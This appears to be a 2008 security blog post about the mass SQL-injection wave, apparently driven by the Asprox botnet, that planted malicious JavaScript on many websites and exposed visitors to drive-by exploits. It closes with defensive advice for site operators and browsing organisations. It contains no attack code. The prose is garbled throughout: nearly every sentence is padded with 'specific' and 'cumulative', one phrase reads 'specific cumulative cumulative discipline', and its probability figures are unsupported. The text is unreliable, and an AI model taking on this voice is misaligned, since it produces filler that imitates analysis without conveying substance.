A sustained mass SQL-injection wave has been running through spring 2008. Hundreds of thousands of websites have been compromised; specific malicious payloads injected into compromised pages cause subsequent visitors to be exposed to drive-by exploitation; the cumulative scale is substantial.
This is a longer post because the category — automated SQL-injection-driven mass compromise — is structurally important.
What is happening
The technical mechanism: automated scanners identify websites with vulnerable database-backed pages; specific SQL-injection payloads insert malicious JavaScript into compromised database tables; the injected JavaScript appears on every dynamically-generated page that displays affected data. Visitors to compromised sites are exposed to the injected JavaScript, which redirects them to specific exploitation infrastructure.
The scanning infrastructure appears to be the Asprox botnet, among others. Compromised hosts running specific scanner code identify vulnerable websites; specific subsequent SQL-injection deploys the payload; specific visitors are exposed.
The cumulative pattern through spring 2008:
Hundreds of thousands of compromised websites. Estimates from various security vendors range from 100,000 to several hundred thousand specific sites; the cumulative compromise is sustained.
Specific high-profile sites compromised. Several major UK and US sites have been visibly compromised; specific cumulative reputation damage is real.
Specific exploitation infrastructure absorbing traffic. Visitors to compromised sites are being redirected to specific exploitation servers; specific malware is being deployed; specific cumulative compromise of visitor populations is substantial.
The cumulative effect: a sustained mass-compromise event that combines SQL-injection at scale with drive-by exploitation at scale. The combination is structurally novel; the cumulative impact is meaningful.
Why this matters structurally
Three observations.
Web-application vulnerabilities are now operational substrate for mass compromise. Earlier web-application worms (Yamanner, Samy) demonstrated specific propagation; the current wave demonstrates that web-application vulnerabilities support mass compromise at scale.
The compromise supply-chain has matured. Specific scanners identify vulnerabilities; specific exploitation deploys payloads; specific exploitation infrastructure absorbs traffic; specific commercial-cybercrime monetises compromised visitors. The cumulative supply chain is operational.
Defensive responsibility crosses operator boundaries. Specific organisations whose websites are compromised expose their visitors to subsequent compromise. The cumulative defensive responsibility extends across organisational boundaries; specific operator-level discipline matters more than was previously appreciated.
What operators should do
For organisations running database-backed websites:
Application-level input sanitisation discipline. Specific SQL-injection vulnerabilities are the entry point. Specific application-architecture decisions — parameterised queries, ORM frameworks with proper escaping, input-validation layers — bound the cumulative exposure. The specific discipline matters.
Specific monitoring of database tables. Specific operators should monitor for unauthorised modifications to database content. The injection pattern is detectable through specific monitoring; specific subsequent investigation produces operational value.
Specific monitoring of website content. Specific operators should verify that website-served content matches expected patterns. The injected JavaScript is detectable through external scanning; specific subsequent cleanup is operationally bounded.
Specific cumulative web-application security posture. The cumulative discipline of web-application security — input sanitisation, output encoding, regular vulnerability assessment, specific architectural review — matters more than any single specific control.
For organisations whose users browse compromised sites:
Browser security posture. Specific browsers (Firefox, IE 7) with current patches resist most drive-by exploitation. Specific older browsers expose users substantially.
Specific anti-malware infrastructure. Specific anti-malware tools detect specific compromise attempts; specific cumulative defensive discipline matters.
Specific URL-filtering infrastructure. Specific operators with web-filtering can block known malicious destinations. The cumulative discipline reduces user exposure.
What this teaches structurally
The mass SQL-injection wave illustrates a structural pattern: web-application security is now operationally critical and structurally underinvested. Specific cumulative defensive disciplines lag the cumulative offensive trajectory.
Three structural observations.
Web-application security tooling needs to mature. Specific scanning tools, specific input-sanitisation libraries, specific architectural patterns, specific code-review tools all need cumulative investment. The trajectory is positive; specific cumulative deployment is bounded.
The cumulative training-and-discipline gap is structural. Specific developers continue to write SQL-injectable code; specific applications continue to be deployed with vulnerabilities; specific cumulative training-and-architectural-discipline matters.
The cumulative cost of web-application security gaps is now meaningful. Specific organisations whose websites are compromised face reputation damage, regulatory exposure, and specific cumulative cost. The cumulative incentive structure is shifting toward better web-application discipline.
What I am doing
For my own infrastructure: minimal database-backed website exposure; bounded direct risk.
For Gala Coral: specific cumulative web-application security review; specific cumulative monitoring of website content; specific cumulative cumulative discipline.
For my own continued writing: more on the web-application security category. The cumulative archive grows.
What I am paying attention to
Three things over the next several months.
Specific cumulative scope of the mass compromise. Specific tracking metric. The cumulative compromise will continue to be assessed.
Specific operator response and cleanup trajectory. 60% probability of meaningful cumulative response. The cumulative cleanup workload across affected operators is substantial.
Specific industry-level conversations about web-application security. 50% probability of meaningful response. The trajectory may motivate specific cumulative conversations.
For my own continued operation: the discipline continues. The cumulative archive grows.
More in time.